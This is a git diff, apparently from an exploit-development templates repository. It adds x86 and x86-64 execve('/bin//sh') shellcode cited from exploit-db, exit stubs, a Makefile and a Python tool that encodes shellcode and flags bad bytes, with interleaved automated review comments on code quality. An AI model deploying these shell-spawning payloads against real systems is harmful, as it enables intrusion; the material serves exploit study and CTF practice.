Diffstat (limited to 'templates')
-rw-r--r--templates/shellcode/Makefile17
-rw-r--r--templates/shellcode/exit32.asm8
-rw-r--r--templates/shellcode/exit64.asm8
-rw-r--r--templates/shellcode/shell32.asm14
-rw-r--r--templates/shellcode/shell64.asm15
-rwxr-xr-xtemplates/shellcode/shelltool.py30
6 files changed, 92 insertions, 0 deletions
diff --git a/templates/shellcode/Makefile b/templates/shellcode/Makefile
new file mode 100644
index 0000000..2e67adc
--- /dev/null
+++ b/templates/shellcode/Makefile
@@ -0,0 +1,17 @@
+.PHONY: all
+
+all: shell32.elf shell64.elf
+ @objdump -d shell32.elf | ./shelltool.py
+ @objdump -d shell64.elf | ./shelltool.py
+
+shell32.o: shell32.asm
+ nasm -f elf shell32.asm -o shell32.o
+
+shell32.elf: shell32.o
+ ld -melf_i386 shell32.o -o shell32.elf
+
+shell64.o: shell64.asm
+ nasm -f elf64 shell64.asm -o shell64.o
+
+shell64.elf: shell64.o
+ ld shell64.o -o shell64.elf
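Review bot: exit32.asm and exit64.asm are added in this commit (see the diffstat) but no rule in this Makefile assembles them, so `make` never builds or checks those two templates and a typo there goes unnoticed until someone assembles them by hand. Adding `exit32.o`/`exit32.elf` and `exit64.o`/`exit64.elf` targets mirroring the shell ones, or a short note in the file saying they are deliberately built by hand, would close that gap. A `clean` target is also missing; `.PHONY: all clean` plus `clean:` with `rm -f *.o *.elf` is enough. The recipe lines appear indented by a single space in the rendered diff, which make rejects — presumably a rendering artifact of a real tab, but worth confirming.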
diff --git a/templates/shellcode/exit32.asm b/templates/shellcode/exit32.asm
new file mode 100644
index 0000000..559c89c
--- /dev/null
+++ b/templates/shellcode/exit32.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+ xor ebx, ebx
+ xor eax, eax
+ mov al, 0x1
+ int 0x80
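Review bot: exit32.asm and exit64.asm carry no comment stating what the stub does, unlike shell32.asm and shell64.asm which at least cite a reference, so a reader of the templates directory has to decode the register setup themselves. For exit32.asm I would add `; exit(0): eax=1 is sys_exit on i386, ebx=0 is the status` above `_start:`, and for exit64.asm `; exit(0): rax=0x3c (set via al) is sys_exit on x86-64, rdi=0 is the status`. In exit64.asm the `cdq` only zeroes edx, which sys_exit does not read; it looks carried over from shell64.asm and could either be dropped or commented as intentional.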
diff --git a/templates/shellcode/exit64.asm b/templates/shellcode/exit64.asm
new file mode 100644
index 0000000..fb899a2
--- /dev/null
+++ b/templates/shellcode/exit64.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+ xor rdi, rdi
+ mov al, 0x3c
+ cdq
+ syscall
diff --git a/templates/shellcode/shell32.asm b/templates/shellcode/shell32.asm
new file mode 100644
index 0000000..d12910f
--- /dev/null
+++ b/templates/shellcode/shell32.asm
@@ -0,0 +1,14 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/46809
+
+_start:
+ xor ecx, ecx
+ push 0xb
+ pop eax
+ push ecx
+ push 0x68732f2f
+ push 0x6e69622f
+ mov ebx, esp
+ int 0x80
diff --git a/templates/shellcode/shell64.asm b/templates/shellcode/shell64.asm
new file mode 100644
index 0000000..a6d4626
--- /dev/null
+++ b/templates/shellcode/shell64.asm
@@ -0,0 +1,15 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/47008
+
+_start:
+ xor rsi, rsi
+ push rsi
+ mov rdi, 0x68732f2f6e69622f
+ push rdi
+ push rsp
+ pop rdi
+ mov al, 0x3b
+ cdq
+ syscall
diff --git a/templates/shellcode/shelltool.py b/templates/shellcode/shelltool.py
new file mode 100755
index 0000000..b95a8cd
--- /dev/null
+++ b/templates/shellcode/shelltool.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+
+# This script will convert shellcode disassembly into an escaped string literal
+# and warn about problematic bytes in the payload.
+# objdump -d elf | ./shelltool.py
+
+import sys
+
+name = None
+bytecode = []
+badchars = [ 0x00, 0x0a ]
+
+for line in sys.stdin:
+ for tok in line.split():
+ if name is None:
+ name = tok
+ if len(tok) == 2:
+ try:
+ bytecode.append(int(tok, base=16))
+ except:
+ pass
+
+result = ''.join([ "\\x%02x"%(x) for x in bytecode ])
+result = f'{name}"{result}"'
+
+for x in badchars:
+ if x in bytecode:
+ result += f' **0x{"%02x"%(x)} detected**'
+
+print(result)
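Review bot: The bare `except:` around `bytecode.append(int(tok, base=16))` swallows every exception, including KeyboardInterrupt and anything unrelated to parsing, while the only failure expected there is a non-hex token; it should read `except ValueError:` (with `pass` or `continue`), which keeps the best-effort behaviour without hiding real errors. The `len(tok) == 2` heuristic treats any two-character hex-looking token anywhere in the objdump text as a payload byte, so a mnemonic or operand fragment that happens to be two hex digits would silently corrupt the output; if I recall correctly GNU objdump separates the address, byte and instruction columns with tabs, so isolating the byte column with `line.split('\t')` before tokenising would be more robust and is worth confirming against real output. The shebang `#!/usr/bin/env python` may resolve to Python 2 on some systems, where the f-strings on the last lines are a syntax error, so `#!/usr/bin/env python3` is safer. The nested `"%02x"%(x)` inside the f-string can simply be `f' **0x{x:02x} detected**'`.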